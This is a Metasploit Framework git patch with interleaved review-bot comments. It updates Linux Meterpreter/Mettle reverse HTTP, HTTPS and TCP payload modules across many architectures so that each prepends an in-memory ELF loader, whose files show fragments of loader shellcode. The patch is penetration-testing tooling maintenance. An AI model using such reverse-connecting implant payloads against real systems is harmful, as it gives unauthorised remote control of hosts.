From 0cc080fbe9cfa89af3bc87bd12cbe108d1c625f5 Mon Sep 17 00:00:00 2001 
From: dledda-r7 Date: Fri, 14 Feb 2025 05:42:14 -0500 Subject: [PATCH] fix: updated mettle payload generation and cached_size --- .../linux/aarch64/meterpreter_loader.rb | 2 +- .../payload/linux/armbe/meterpreter_loader.rb | 2 +- .../payload/linux/armle/meterpreter_loader.rb | 2 +- .../payload/linux/ppc/meterpreter_loader.rb | 2 +- .../linux/ppc64le/meterpreter_loader.rb | 2 +- .../linux/ppce500v2/meterpreter_loader.rb | 2 +- .../linux/aarch64/meterpreter_reverse_http.rb | 6 +++-- .../aarch64/meterpreter_reverse_https.rb | 6 +++-- .../linux/aarch64/meterpreter_reverse_tcp.rb | 22 ++++++++++--------- .../linux/armbe/meterpreter_reverse_http.rb | 7 ++++-- .../linux/armbe/meterpreter_reverse_https.rb | 6 +++-- .../linux/armbe/meterpreter_reverse_tcp.rb | 22 ++++++++++--------- .../linux/armle/meterpreter_reverse_http.rb | 6 +++-- .../linux/armle/meterpreter_reverse_https.rb | 7 ++++-- .../linux/armle/meterpreter_reverse_tcp.rb | 21 +++++++++--------- .../linux/mips64/meterpreter_reverse_http.rb | 6 +++-- .../linux/mips64/meterpreter_reverse_https.rb | 7 ++++-- .../linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 6 +++-- .../linux/mipsbe/meterpreter_reverse_https.rb | 6 +++-- .../linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsle/meterpreter_reverse_http.rb | 6 +++-- .../linux/mipsle/meterpreter_reverse_https.rb | 6 +++-- .../linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- .../linux/x64/meterpreter_reverse_http.rb | 6 +++-- .../linux/x64/meterpreter_reverse_https.rb | 6 +++-- .../linux/x64/meterpreter_reverse_tcp.rb | 3 ++- .../linux/x86/meterpreter_reverse_http.rb | 6 +++-- .../linux/x86/meterpreter_reverse_https.rb | 6 +++-- .../linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../linux/zarch/meterpreter_reverse_http.rb | 6 +++-- .../linux/zarch/meterpreter_reverse_https.rb | 6 +++-- .../linux/zarch/meterpreter_reverse_tcp.rb | 21 +++++++++--------- tools/modules/meterpreter_reverse.erb | 4 +++- 34 files changed, 
136 insertions(+), 88 deletions(-) diff --git a/lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb b/lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb index 3f76f524f7..2e99a95816 100644 --- a/lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb @@ -5,7 +5,7 @@ # Resource and Credits: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html # module Msf::Payload::Linux::Aarch64::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x0a0080d2, # 0x1000: mov x10, #0 0x0a0080d2 0xea0300f9, # 0x1004: str x10, [sp] 0xea0300f9 diff --git a/lib/msf/core/payload/linux/armbe/meterpreter_loader.rb b/lib/msf/core/payload/linux/armbe/meterpreter_loader.rb index d1d160f7a8..e573ff1445 100644 --- a/lib/msf/core/payload/linux/armbe/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/armbe/meterpreter_loader.rb @@ -6,7 +6,7 @@ # Resource and Credits: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html # module Msf::Payload::Linux::Armbe::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x0020a0e3, # 0x1000: mov r2, #0 0x0020a0e3 0x04202de5, # 0x1004: str r2, [sp, #-4]! 0x04202de5 diff --git a/lib/msf/core/payload/linux/armle/meterpreter_loader.rb b/lib/msf/core/payload/linux/armle/meterpreter_loader.rb index 59f84bfaee..c3c3039405 100644 --- a/lib/msf/core/payload/linux/armle/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/armle/meterpreter_loader.rb @@ -5,7 +5,7 @@ # Resource and Credits: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html # module Msf::Payload::Linux::Armle::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0xe3a02000, #0x1000: mov r2, #0 0xe3a02000 0xe52d2004, #0x1004: str r2, [sp, #-4]! 0xe52d2004 
diff --git a/lib/msf/core/payload/linux/ppc/meterpreter_loader.rb b/lib/msf/core/payload/linux/ppc/meterpreter_loader.rb index a8b1d99aa0..a24db4cbdb 100644 --- a/lib/msf/core/payload/linux/ppc/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/ppc/meterpreter_loader.rb @@ -6,7 +6,7 @@ # module Msf::Payload::Linux::Ppc::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x48000084, # 0x1000: b 0x1084 0x48000084 diff --git a/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb b/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb index d1e82cf2b1..02e0b3674b 100644 --- a/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb @@ -6,7 +6,7 @@ # module Msf::Payload::Linux::Ppc64le::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x4800007c, # 0x1000: b 0x107c 0x4800007c 0x7de802a6, # 0x1004: mflr r15 0x7de802a6 diff --git a/lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb b/lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb index e3fd8c8cb1..8a1aa92fd9 100644 --- a/lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb @@ -7,7 +7,7 @@ module Msf::Payload::Linux::Ppce500v2::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x48000084, # 0x1000: b 0x1084 0x48000084 0x7de802a6, # 0x1004: mflr r15 0x7de802a6 diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 8fc69c37be..04de100496 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb 
@@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Aarch64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index 573b88819f..e8e9785537 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Aarch64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 847bddcf0c..b4c2d6abdf 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb 
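Review bot: In the second hunk of aarch64/meterpreter_reverse_http.rb, `def generate` drops the optional `_opts = {}` parameter, so any caller that still passes an options hash to `generate` would raise ArgumentError; the callers are not visible in this patch. Keeping `def generate(_opts = {})` is backward-compatible and costs nothing. The same signature change repeats in every `generate` hunk of the patch (the http, https and tcp modules for aarch64, armbe, armle, mips64, mipsbe, mipsle, x64, x86 and zarch). Several of the tcp modules gain a "Module generated by tools/modules/generate_mettle_payloads.rb" comment, so the fix probably belongs in the generator template rather than in each module.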
@@ -3,6 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1184672 @@ -11,32 +12,33 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig include Msf::Payload::Linux::Aarch64::MeterpreterLoader + def initialize(info = {}) super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse TCP Inline', - 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', - 'Author' => [ + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], - 'Platform' => 'linux', - 'Arch' => ARCH_AARCH64, - 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux + 'Platform' => 'linux', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux ) ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec - in_memory_loader(payload) + payload + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index e0344f9817..7689263c82 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb 
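Review bot: The `'Description'` string in the second hunk of aarch64/meterpreter_reverse_tcp.rb still reads 'Run the Meterpreter / Mettle server payload (stageless)', although `generate` returns `in_memory_load(payload) + payload`, i.e. the Mettle binary with the loader's output in front of it. Anyone relying on module metadata to understand what the generated bytes contain, including defenders building detections from it, gets no hint of that. The http and https singles newly gain this prefix in this patch, so the gap matters more there. Consider `'Description' => 'Run the Meterpreter / Mettle server payload (stageless), prefixed with the in-memory ELF loader'`, or at least a comment above `generate`; the wording assumes the loader behaves as the write-up credited in the loader files describes.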
@@ -7,9 +7,11 @@ module MetasploitModule CachedSize = 1106544 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Armbe::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +33,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index fd3b4e53ca..84db685980 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Armbe::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 11df66faec..8c69f00b0d 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb 
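Review bot: `CachedSize = 1106544` is left as unchanged context in the first hunk of armbe/meterpreter_reverse_http.rb, while the second hunk of the same file makes `generate` return `in_memory_load(payload) + payload` instead of the bare Mettle binary, so the cached value presumably no longer matches the generated size. The commit subject mentions cached_size, yet no visible hunk changes a `CachedSize` line. The same unchanged constant shows in armle/meterpreter_reverse_https.rb (1106844) and mips64/meterpreter_reverse_https.rb (1685392). Either regenerate the constants with the project's cached-size update step, or say in the commit message why they stay the same.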
@@ -3,6 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1106544 @@ -11,32 +12,33 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig include Msf::Payload::Linux::Armbe::MeterpreterLoader + def initialize(info = {}) super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse TCP Inline', - 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', - 'Author' => [ + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMBE, - 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_armbe_Linux + 'Platform' => 'linux', + 'Arch' => ARCH_ARMBE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_armbe_Linux ) ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec - in_memory_loader(payload) + payload + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index f3c9774bed..3dc4c84145 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Armle::MeterpreterLoader def initialize(info = {}) super( 
@@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 1af2703707..d4ca921d10 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -7,9 +7,11 @@ module MetasploitModule CachedSize = 1106844 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Armle::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +33,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index d660a88236..1dc4d99db9 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -3,6 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1106844 
@@ -16,28 +17,28 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse TCP Inline', - 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', - 'Author' => [ + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_armle_Linux + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_armle_Linux ) ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec - in_memory_loader(payload) + payload + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 39740373e3..30cf576aff 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mips64::MeterpreterLoader def initialize(info = {}) super( 
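Review bot: The added `include Msf::Payload::Linux::Mips64::MeterpreterLoader` in mips64/meterpreter_reverse_http.rb depends on a mixin this patch does not touch: the diffstat renames `in_memory_loader` to `in_memory_load` only in the aarch64, armbe, armle, ppc, ppc64le and ppce500v2 loaders. If the Mips64 loader still exposes the old name, the `in_memory_load(payload)` call in this file's second hunk would fail at generation time with NoMethodError. The same applies to the Mipsbe, Mipsle, X64, X86 and Zarch includes further down. The tcp hunks for mips64, mipsbe, mipsle, x64 and x86 end before the loader call, so which name they use cannot be checked from here. Please confirm those loaders already define `in_memory_load`, and consider a comment on the include such as `# supplies in_memory_load for #generate`.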
@@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index 43d965b7ab..6b86ea0ef2 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -7,9 +7,11 @@ module MetasploitModule CachedSize = 1685392 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mips64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +33,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 028af6ce61..14d681cd73 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true 
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index 4a5871ae8b..ef306ab382 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mipsbe::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 7b9a4f340f..7cdf9b8ce2 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mipsbe::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end 
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 4fd14de3a0..f1df48487a 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index be0d4e92e9..414d350fa3 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mipsle::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index a825280770..444040f640 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb 
@@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mipsle::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 91a2063cb8..9888ed7134 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 0f13084748..404bc6509d 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::X64::MeterpreterLoader def initialize(info = {}) super( 
@@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index 092137b4e3..89944b0e12 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::X64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index cb4f2155df..c646651a74 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -11,6 +11,7 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig include Msf::Payload::Linux::X64::MeterpreterLoader + def initialize(info = {}) super( update_info( 
@@ -31,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index f00fc17bae..b140c6afee 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::X86::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index ca981dbf70..333695cf69 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::X86::MeterpreterLoader def initialize(info = {}) super( 
